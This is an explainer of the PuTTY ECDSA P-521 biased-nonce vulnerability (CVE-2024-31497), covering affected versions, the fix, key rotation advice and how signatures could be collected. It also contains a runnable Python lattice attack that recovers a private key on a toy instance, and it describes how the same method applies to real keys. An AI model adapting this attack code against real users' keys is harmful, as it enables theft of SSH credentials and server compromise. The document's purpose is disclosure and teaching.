PuTTY Security Flaw: Vulnerability Allowing Recovery of a User's Private Key (CVE-2024-31497)

A dangerous vulnerability (CVE-2024-31497) has been identified in PuTTY, an SSH client that is popular on the Windows platform. It allows recovery of the user's private key when the key is an ECDSA key on the NIST P-521 elliptic curve (ecdsa-sha2-nistp521). To recover the private key, it is enough to analyze approximately 60 digital signatures produced with the affected key.

The vulnerability is present starting from PuTTY 0.68 and also affects products that bundle vulnerable versions of PuTTY, for example FileZilla (3.24.1 – 3.66.5), WinSCP (5.9.5 – 6.3.2), TortoiseGit (2.4.0.2 – 2.15.0) and TortoiseSVN (1.10.0 – 1.14.6). The problem is fixed in PuTTY 0.81, FileZilla 3.67.0, WinSCP 6.3.3 and TortoiseGit 2.15.0.1. Installing the update alone is not sufficient, because every signature already made with an affected P-521 key has leaked information about it: users are advised to treat such keys as compromised, generate new keys, and remove the old public keys from the authorized_keys files on the servers they access.


The vulnerability stems from the way the developers derived the per-signature nonce (the secret value k that ECDSA needs for every signature, sometimes loosely called an initialization vector). PuTTY generated it deterministically from a 512-bit SHA-512 output and then reduced that value modulo the 521-bit group order, apparently assuming that 512 bits of entropy were plenty and that the remaining 9 bits were of no fundamental importance. Since a 512-bit value is always smaller than the 521-bit order, the reduction changes nothing: in every signature PuTTY produced with an ecdsa-sha2-nistp521 key, the top 9 bits of the nonce were zero. PuTTY 0.81 replaces this construction with the deterministic nonce generation of RFC 6979.

For ECDSA and DSA, the quality of the nonce is of fundamental importance: it must be uniformly distributed over the entire range of the group order, and knowledge of even a few bits of each nonce, accumulated across enough signatures, is sufficient to recover the whole private key. To carry out the attack, it is enough to have the public key and several dozen signatures produced with the affected key over data known to the attacker. The attack reduces to an instance of the Hidden Number Problem (HNP), which is solved with lattice reduction.
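The following is an added example, not PuTTY's code or anything from the advisory, that reproduces the two preceding paragraphs in miniature. It first shows, with the real P-521 group order, why a 512-bit hash reduced modulo a 521-bit order always leaves the top 9 nonce bits zero. It then mounts the Hidden Number Problem attack on a toy: the group order is a 48-bit prime (so exact-rational LLL runs in seconds), the nonce is derived from a hash 10 bits shorter than the order, and the curve point multiplication is replaced by a random r, which is an assumption that does not change the attack because the lattice step only uses the ECDSA relation s·k = h + r·d (mod n). The hash input layout in `putty_style_nonce`, the constructed messages and the seeded RNG are also assumptions for illustration.

```python
"""Toy reproduction of the biased-nonce lattice attack (Hidden Number Problem)
behind CVE-2024-31497. Added example, not PuTTY's code: the curve is replaced by a
random r (the lattice step only needs s*k = h + r*d mod n) and the toy group order
is 48 bits so that exact-rational LLL finishes in seconds."""
import hashlib
import random
from fractions import Fraction

# Real P-521 group order (521 bits). A 512-bit SHA-512 digest is always below it,
# so "reducing" the digest mod n changes nothing: the top 9 bits of k are zero.
N_P521 = int("1" + "F" * 65 + "A51868783BF2F966B7FCC0148F709A5D03BB5C9B8899C47AEBB6FB71E91386409", 16)

def putty_style_nonce(priv: int, msg: bytes, n: int) -> int:
    """Schematic of the pre-0.81 construction (a SHA-512 digest reduced mod n);
    the exact hash input layout is an assumption, not PuTTY's format."""
    return int.from_bytes(hashlib.sha512(priv.to_bytes(66, "big") + msg).digest(), "big") % n

# ---- toy instance: 48-bit prime order, nonces with the top BIAS bits zero ----
N_TOY = 281474976710597   # 2**48 - 59, prime
BIAS = 10
K_MAX = 1 << (48 - BIAS)

def toy_sign(d: int, msg: bytes, rng: random.Random):
    """ECDSA-shaped signature whose nonce comes from a hash BIAS bits shorter than
    the order (cf. 512 bits into 521). r stands in for x(kG) mod n (assumption)."""
    h = int.from_bytes(hashlib.sha256(msg).digest(), "big") % N_TOY
    digest = hashlib.sha512(d.to_bytes(6, "big") + msg).digest()
    k = (int.from_bytes(digest, "big") >> (512 - (48 - BIAS))) or 1
    r = rng.randrange(1, N_TOY)
    s = pow(k, -1, N_TOY) * (h + r * d) % N_TOY
    return h, r, s

def lll(basis, delta=Fraction(3, 4)):
    """Textbook LLL over exact rationals; fine for a dozen rows."""
    b = [list(row) for row in basis]
    n = len(b)
    dot = lambda u, v: sum(x * y for x, y in zip(u, v))
    bstar, mu = [None] * n, [[Fraction(0)] * n for _ in range(n)]

    def gram_schmidt(start):            # rows below `start` are unchanged
        for i in range(start, n):
            v = [Fraction(x) for x in b[i]]
            for j in range(i):
                mu[i][j] = dot(b[i], bstar[j]) / dot(bstar[j], bstar[j])
                v = [x - mu[i][j] * y for x, y in zip(v, bstar[j])]
            bstar[i] = v

    gram_schmidt(0)
    k = 1
    while k < n:
        for j in range(k - 1, -1, -1):  # size-reduce row k; b* does not change
            q = round(mu[k][j])
            if q:
                b[k] = [x - q * y for x, y in zip(b[k], b[j])]
                for l in range(j + 1):
                    mu[k][l] -= q * (mu[j][l] if l < j else 1)
        if dot(bstar[k], bstar[k]) >= (delta - mu[k][k - 1] ** 2) * dot(bstar[k - 1], bstar[k - 1]):
            k += 1
        else:                           # Lovasz condition fails: swap, redo GS
            b[k], b[k - 1] = b[k - 1], b[k]
            gram_schmidt(k - 1)
            k = max(k - 1, 1)
    return b

def recover_key(sigs, n=N_TOY, kmax=K_MAX):
    """HNP: each signature gives k_i = a_i*d + b_i (mod n) with 0 <= k_i < kmax.
    Eliminating d via signature 0 gives k_i = t_i*k_0 + u_i (mod n); the lattice
    below then contains the unusually short vector (k_1..k_{m-1}, k_0, kmax)."""
    a = [r * pow(s, -1, n) % n for _, r, s in sigs]
    b = [h * pow(s, -1, n) % n for h, _, s in sigs]
    inv_a0 = pow(a[0], -1, n)
    t = [ai * inv_a0 % n for ai in a[1:]]
    u = [(bi - ti * b[0]) % n for bi, ti in zip(b[1:], t)]
    m = len(t)
    basis = [[n if j == i else 0 for j in range(m + 2)] for i in range(m)]
    basis += [t + [1, 0], u + [0, kmax]]
    for row in lll(basis):
        if abs(row[-1]) != kmax:
            continue
        if row[-1] < 0:
            row = [-x for x in row]
        d = (row[m] - b[0]) * inv_a0 % n
        if all((ai * d + bi) % n < kmax for ai, bi in zip(a, b)):
            return d
    return None

def demo(seed=2024, m=12):
    """Sign m constructed messages under one key, then recover it. Rule of thumb:
    m*BIAS must exceed the order's bit length (12*10 > 48; for P-521, 60*9 > 521)."""
    rng = random.Random(seed)
    d = rng.randrange(1, N_TOY)
    sigs = [toy_sign(d, f"constructed message {i}".encode(), rng) for i in range(m)]
    return d, recover_key(sigs)

if __name__ == "__main__":
    d, found = demo()
    print("toy private key recovered:", found == d)
```

The scaling is the instructive part: the lattice has a solution as soon as the total number of leaked bits, signatures times biased bits per nonce, exceeds the bit length of the group order, which is why 12 signatures suffice for 10 of 48 bits here and about 60 (the smallest multiple of 9 above 521 is 58) suffice against PuTTY's 9 of 521 bits. The pure-Python LLL is deliberately naive and takes a few seconds; anyone checking a real P-521 key would use a proper lattice library, but the construction of the basis is the same.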

The necessary signatures can be obtained, for example, when the victim connects to an SSH server controlled by the attacker, or to a Git server that uses SSH as its transport. They can also be collected if the key was used to sign arbitrary data, for example Git commits signed through the Pageant SSH agent, since the signatures on published commits are visible to anyone who can read the repository. Collecting the required data by eavesdropping on or intercepting the user's connections to honest servers is not possible, because in SSH the client's signature is transmitted inside the encrypted channel, not in clear text.

It is noted that PuTTY used the same truncated nonce construction for its other ECDSA key types, but for algorithms other than ECDSA P-521 the group order is shorter than the 512-bit hash output, so the reduction leaves no usable bias and the information leak is not sufficient for a working key recovery attack. ECDSA keys of other sizes and Ed25519 keys are not susceptible.
